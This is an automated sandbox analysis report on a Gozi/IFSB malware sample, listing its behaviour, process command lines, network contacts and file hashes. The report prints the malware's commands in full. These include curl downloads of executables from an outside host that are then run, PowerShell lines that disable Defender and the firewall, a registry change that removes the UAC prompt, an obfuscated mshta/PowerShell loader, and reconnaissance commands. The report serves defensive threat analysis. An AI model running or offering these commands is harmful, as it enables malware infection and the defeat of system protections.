Analysis Overview
SHA256: e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
Threat Level: Known bad
The file 98b082b4d65dfe4ee5b227575d1c08ef.png was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Gozi, Gozi IFSB
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of FindShellTrayWindow
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Discovers systems in the same network
Gathers system information
Suspicious behavior: GetForegroundWindowSpam
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
Suspicious use of SendNotifyMessage
Enumerates processes with tasklist
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-22 09:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-22 09:41
Reported
2022-03-22 09:46
Platform
win7-20220310-en
Max time kernel
4294183s
Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe
"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-22 09:41
Reported
2022-03-22 09:46
Platform
win10v2004-20220310-en
Max time kernel
151s
Max time network
154s
Command Line
Signatures
Gozi, Gozi IFSB
UAC bypass
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1768 set thread context of 620 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe |
| PID 4616 set thread context of 1048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1048 set thread context of 5004 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 1048 set thread context of 3440 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1048 set thread context of 3740 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 5004 set thread context of 2144 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 1048 set thread context of 3428 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1048 set thread context of 392 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe
"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au3
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/12/WD.au3 --output WD.au3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au3
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
AutoIt3.exe WD.au3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
"C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sincheats.com | udp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| NL | 104.80.225.205:443 | | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| NL | 84.53.175.107:80 | | tcp |
| NL | 84.53.175.107:80 | | tcp |
| US | 217.21.76.148:80 | sincheats.com | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| DE | 194.76.226.200:80 | 194.76.226.200 | tcp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| BE | 193.56.146.189:80 | 193.56.146.189 | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| DE | 194.76.226.200:80 | 194.76.226.200 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| US | 8.8.8.8:53 | giporedtrip.at | udp |
| US | 8.8.8.8:53 | habpfans.at | udp |
| PA | 190.219.54.242:80 | habpfans.at | tcp |
Files
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
| MD5 | bb0371ce2ac7e24536ace54e03700a9c |
| SHA1 | 6002d876e35075abc3595bc91d41c77d77311e71 |
| SHA256 | 93248391cfe7319c7cd4b0291ab42b0d1ce6a967f5d89df2ac72555c026cb0b5 |
| SHA512 | d154ad51cbf62d77d2dc43224ec609abaa0f8db1cead0cca55f6bc06f93ed8abb33999b405c1052c4c813ef5fd5ceb0973c3eabb369cac16dd7b333db0b71842 |
C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
| MD5 | 2557201a634b8e98c1ed3bfd39015a3a |
| SHA1 | 94496b50fc6507494381e5e5597dab49dd5121ab |
| SHA256 | bca824981cc23516a047cebefab5c0f42df8d0f79b27000f53bfc16cd1149a32 |
| SHA512 | dd8bbf6a41003bda6c53ffa1053907f7d0e21e060c2f3c2d1af18dae4a65ed1e14d53810eea0661220efbf60359bebded3f6eed39890ea1b4cd2eb22026a5d93 |
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
| MD5 | 0d820062cd4e9281229fc36bd2495bf0 |
| SHA1 | 5375c3d8f680f956d487de87c187e7581cc7f677 |
| SHA256 | 294585edf06fea398c1507bf6a002360e37c5b6516e1c1fb4fb2f4842c1adf9b |
| SHA512 | 0247de017b429d74e721075808eb15839514f62eb3d01668697c5aad909ecb371a73530fb70cc41b803bfe96defc48f05c95dd78d983a5df70c246426d85529d |
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Admin\AppData\Local\Temp\WD.au3
| MD5 | a7dedbe8c2e9f408d53df42412fae7df |
| SHA1 | b9b6d45367cf6fc08c023f10ad78a5ca4112d518 |
| SHA256 | 6681330ccd6ece3b0f34d22cfc37421889db8556c4ddff56ceb3da4db9901d41 |
| SHA512 | abe5bb993d433d434646c85984fe8f92ff40bfec41431901ee0cb54026b401005c62361d906e7af3204fd7fb81d26a52b5720265b1be4666b874628e92d79596 |
C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
| MD5 | 377cac15c169282c8bb7eeccca102767 |
| SHA1 | 147684c819d3df332cac15fa4df4ad0a286b7b8a |
| SHA256 | 908f8c8f384cb59942cd2fe544c50c5488b5bf275cb7ddacb5c02756a3be8dc5 |
| SHA512 | 317cf4628ff282f38dc1c79e6049e2eb9ae73bc470bc10c896502a5567845dcb1363f2ded15016d567a99941060454b43742010e69d03e95cd4329cb6ca759c8 |
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cf49541f85a11a6dae4e6633f2af97f5 |
| SHA1 | 190e951e1e830d26db6164774ef4a2b895ea53c0 |
| SHA256 | 7007b9b332b458192338a82881c4cb3e923dcb16c971e7ab53148fbc402f8e61 |
| SHA512 | 87b0ebb799854ed78d61a83af2933b7d78967dc8fb6e9f19e86448337815cf8227801e71fd958d5f6d79800dcab602a9d78ab53c2298ae155410e83f4b02935c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a371f763359e1f378dd59d4d73fc22ba |
| SHA1 | eaa73c31c9ec87fa0b905a7adf31ef7ca96827de |
| SHA256 | c2e23afd164872ebf5161f81aaaf498158500df3e005ebe8debbd864b75c2382 |
| SHA512 | a23bf93828de09ca2d7cd4605b352b8442498ecca1b8de7e551d4bd57e6f5c26ef5062ddc5ff38771a00d032b21307f7c0a3514c0fec6640280b0e45eb71f499 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dbc28b68bc254b88c6311d1a9b608c59 |
| SHA1 | 90630652a711d5bab18bb02d5378ea04d49b6fb2 |
| SHA256 | 750f2bdbd645d5145d1988eab7ef9ac7da7b815b37e4d5ffe4e10a561ec35d74 |
| SHA512 | 1252b0707d8adaa0f803b65e5364e2c74be2d6bbe58303ce15a07eddaa9392425dcaba8e45e13ea593aba73e2a1f53d00ba6001be37d847aaa3af6a66a857cf8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 237850810567818bfdee54350f48141e |
| SHA1 | ac6a7601a9eefabd346406d317dba9bea2a7aa06 |
| SHA256 | b3158ef56b5e405e5bcd4ac4f1d2267898e36ed847b920657d06364d48438dde |
| SHA512 | c4522e8cf92b7aaff1bd86ed95d285d114cdd4206c6a75b274a63e284f96191178f78514653b1f8d8fbe6533c7e8e44310525e980125a2f0e3fbc5f5ff5f998e |
\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline
| MD5 | a547b9b3cc1f4df2859b7a9bd7931a3f |
| SHA1 | 765ce8dab4c1d51b5ca67751a573684dbe584b06 |
| SHA256 | f8b02bf1ddca39c1756e877571c3e2ec5858b1da2cd8db8613496d73311b09f6 |
| SHA512 | 09d91adc8acb556e70a7abaeaa2b0c2628e6735c49879b7e9dd12dd97c3c2b6518229c01b9f4ef6d41d693c82f8cf40ca003366f3de957215f8f2fd68b10c745 |
\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.0.cs
| MD5 | 0b7537cf8128ca1320d7bf219bb65b46 |
| SHA1 | 33ca68f06067df84baa078137f1285102d30cb3a |
| SHA256 | 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8 |
| SHA512 | 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276 |
\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP
| MD5 | 11fe82b214cc2286a43d10efd56e1152 |
| SHA1 | f60a607b4b28be7c2d8d17e5c6f91b1a155f0f96 |
| SHA256 | 2c692831adb728646664bfe08a7f878b1fe7ff05e94cc4b3f77c90d1ea4dd532 |
| SHA512 | 6f435fc2627a40934bc6bc70df79a4dede52d187badbce0821a70789c1bf19a5c6fa77017266a45cdd48bb4dab35be1e40097819b791a7cc548fa31cdf7dd977 |
C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp
| MD5 | 67213eb2dd60ef8b67fc8b70a01cfb25 |
| SHA1 | 0095dbc594e164188eaaa4a307bbe6488ad10744 |
| SHA256 | 75d3b38869f3eaa6238dcf6e35591c85e903890b5707b0826ffe0f296ebd0854 |
| SHA512 | b7a7aa77a03c7112e2ea9d27d6218662c0903884a0075ad29c1b2e5258d063c7435da1b02c187a08ee1daabb1901da46fcce29fed2eea9221353a211fedd17f7 |
C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.dll
| MD5 | 66eb8a277649a024943f56832a90e181 |
| SHA1 | d8e85394c1782bffe9cc06b2a9b1497308cfa7dc |
| SHA256 | 83cbedef1cacc6c3b87530242e635dc0adf9b3bd07b542c441cf42136401414f |
| SHA512 | 8f53510c9bd3e3ab8ce7e1ec5bf68e27c54cbef08ed10ef7a76f1164b05a81982a63a234403e20ba98d3099424f0816135cb84ccdac4e663048147d6c9d4c6cd |
\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline
| MD5 | 8b53a3921ddf8071130e25193508854a |
| SHA1 | 2d1d6cbbc991e87bcedad744f6a6b1ed45081588 |
